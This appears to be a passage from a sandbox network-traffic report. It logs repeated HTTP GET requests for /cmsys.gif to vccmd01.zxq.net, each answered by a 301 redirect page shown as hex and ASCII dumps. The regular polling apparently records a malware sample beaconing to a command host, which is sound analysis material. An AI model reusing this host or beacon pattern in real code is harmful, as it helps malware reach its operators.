                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:07.082952023 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:07.262295008 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:07 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:13.708194971 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:13.887725115 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:13 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:19.845168114 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:20.024399996 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:19 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.894148111 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:26.073282957 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:25 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.327148914 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.506266117 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:31 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:36.469264984 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:36.657159090 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:36 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:41.861623049 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:42.041150093 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:41 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.796974897 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.976233006 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:09:47 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.983978033 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:54.163439989 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
